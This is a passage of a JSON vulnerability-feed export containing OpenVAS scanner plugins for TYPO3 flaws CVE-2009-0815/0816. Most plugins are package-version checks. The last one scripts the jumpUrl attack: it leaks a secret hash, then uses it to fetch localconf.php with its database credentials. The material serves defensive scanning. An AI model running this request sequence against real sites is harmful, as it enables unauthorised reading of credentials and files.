encyption key via the install tool\nafter installing the update.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 4.0.2+debian-8.\n\nFor the testing distribution (lenny) these problems have been fixed in\nversion 4.2.5-1+lenny1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.2.6-1.\n\nWe recommend that you upgrade your typo3 package.\";\ntag_summary = \"The remote host is missing an update to typo3-src\nannounced via advisory DSA 1720-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201720-1\";\n\n\nif(description)\n{\n script_id(63393);\n script_cve_id(\"CVE-2009-0815\",\"CVE-2009-0816\");\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Debian Security Advisory DSA 1720-1 (typo3-src)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"typo3-src-4.0\", ver:\"4.0.2+debian-8\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"typo3\", ver:\"4.0.2+debian-8\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:52", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-28T00:00:00", "published": "2009-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63356", "id": "OPENVAS:63356", "title": "FreeBSD Ports: typo3", "type": "openvas", "sourceData": "#\n#VID cc47fafe-f823-11dd-94d9-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID cc47fafe-f823-11dd-94d9-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: typo3\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/33829/\nhttp://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/\nhttp://www.vuxml.org/freebsd/cc47fafe-f823-11dd-94d9-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(63356);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_name(\"FreeBSD Ports: typo3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"typo3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.2.6\")<0) {\n txt += 'Package typo3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:37:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063356", "id": "OPENVAS:136141256231063356", "title": "FreeBSD Ports: typo3", "type": "openvas", "sourceData": "#\n#VID cc47fafe-f823-11dd-94d9-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID cc47fafe-f823-11dd-94d9-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: typo3\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/33829/\nhttp://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/\nhttp://www.vuxml.org/freebsd/cc47fafe-f823-11dd-94d9-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63356\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_name(\"FreeBSD Ports: typo3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"typo3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.2.6\")<0) {\n txt += 'Package typo3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:39:07", "bulletinFamily": "scanner", "description": "The remote host is missing an update to typo3-src\nannounced via advisory DSA 1720-1.", "modified": "2018-04-06T00:00:00", "published": "2009-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063393", "id": "OPENVAS:136141256231063393", "type": "openvas", "title": "Debian Security Advisory DSA 1720-1 (typo3-src)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1720_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1720-1 (typo3-src)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in the TYPO3 web\ncontent management framework.\n\nMarcus Krause and Michael Stucki from the TYPO3 security team\ndiscovered that the jumpUrl mechanism discloses secret hashes enabling\na remote attacker to bypass access control by submitting the correct\nvalue as a URL parameter and thus being able to read the content of\narbitrary files.\n\nJelmer de Hen and Dmitry Dulepov discovered multiple cross-site\nscripting vulnerabilities in the backend user interface allowing\nremote attackers to inject arbitrary web script or HTML.\n\nAs it is very likely that your encryption key has been exposed we\nstrongly recommend to change your encyption key via the install tool\nafter installing the update.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 4.0.2+debian-8.\n\nFor the testing distribution (lenny) these problems have been fixed in\nversion 4.2.5-1+lenny1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.2.6-1.\n\nWe recommend that you upgrade your typo3 package.\";\ntag_summary = \"The remote host is missing an update to typo3-src\nannounced via advisory DSA 1720-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201720-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63393\");\n script_cve_id(\"CVE-2009-0815\",\"CVE-2009-0816\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Debian Security Advisory DSA 1720-1 (typo3-src)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"typo3-src-4.0\", ver:\"4.0.2+debian-8\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"typo3\", ver:\"4.0.2+debian-8\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:37:15", "bulletinFamily": "scanner", "description": "This host is installed with TYPO3 and is prone to multiple vulnerabilities.", "modified": "2019-03-12T00:00:00", "published": "2013-12-26T00:00:00", "id": "OPENVAS:1361412562310803989", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803989", "title": "TYPO3 jumpUrl File Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_typo3_jumpurl_file_disclosure_vuln.nasl 14117 2019-03-12 14:02:42Z cfischer $\n#\n# TYPO3 jumpUrl File Disclosure Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:typo3:typo3\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803989\");\n script_version(\"$Revision: 14117 $\");\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_bugtraq_id(33714);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 15:02:42 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-12-26 17:48:31 +0530 (Thu, 26 Dec 2013)\");\n script_name(\"TYPO3 jumpUrl File Disclosure Vulnerability\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to steal the\n victim's cookie-based authentication credentials or access arbitrary file.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a Crafted HTTP GET request and check whether it is able to fetch a\n remote file.\");\n\n script_tag(name:\"insight\", value:\"Multiple error exists in the application,\n\n - An error exist in jumpUrl mechanism, which will disclose a hash secret.\n\n - An error exist in backend user interface, which fails to validate user\n supplied input properly.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to TYPO3 version 4.0.12, 4.1.10, 4.2.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"This host is installed with TYPO3 and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"affected\", value:\"TYPO3 versions 3.3.x, 3.5.x, 3.6.x, 3.7.x, 3.8.x, 4.0 to 4.0.11,\n 4.1.0 to 4.1.9, 4.2.0 to 4.2.5, 4.3alpha1\");\n\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1021710\");\n script_xref(name:\"URL\", value:\"http://typo3.org/teams/security/security-bulletins/typo3-core/TYPO3-SA-2009-002/\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_typo3_detect.nasl\");\n script_mandatory_keys(\"TYPO3/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"url_func.inc\");\ninclude(\"http_func.inc\");\n\ninclude(\"host_details.inc\");\n\nif(!typoPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(typoLoca = get_app_location(cpe:CPE, port:typoPort))\n{\n url = \"/?jumpurl=\" + urlencode(str:\"typo3conf/localconf.php\")+\n \"&type=0&juSecure=1&locationData=\"+ urlencode(str:\"2:\");\n\n sndReq = http_get(item:string(typoLoca, url), port:typoPort);\n rcvRes = http_send_recv(port:typoPort, data:sndReq);\n\n hash = eregmatch(pattern:\"jumpurl Secure: Calculated juHash, ([a-z0-9]+), did not match\" , string:rcvRes);\n\n if(hash[1])\n {\n hashURL = url + \"&juHash=\" + hash[1];\n\n sndReq = http_get(item:string(typoLoca, hashURL), port:typoPort);\n rcvRes = http_send_recv(port:typoPort, data:sndReq);\n\n if(rcvRes && rcvRes =~ \"HTTP/1.. 200\" && \"$typo_db\" >< rcvRes &&\n \"$typo_db_username\" >< rcvRes)\n {\n security_message(typoPort);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}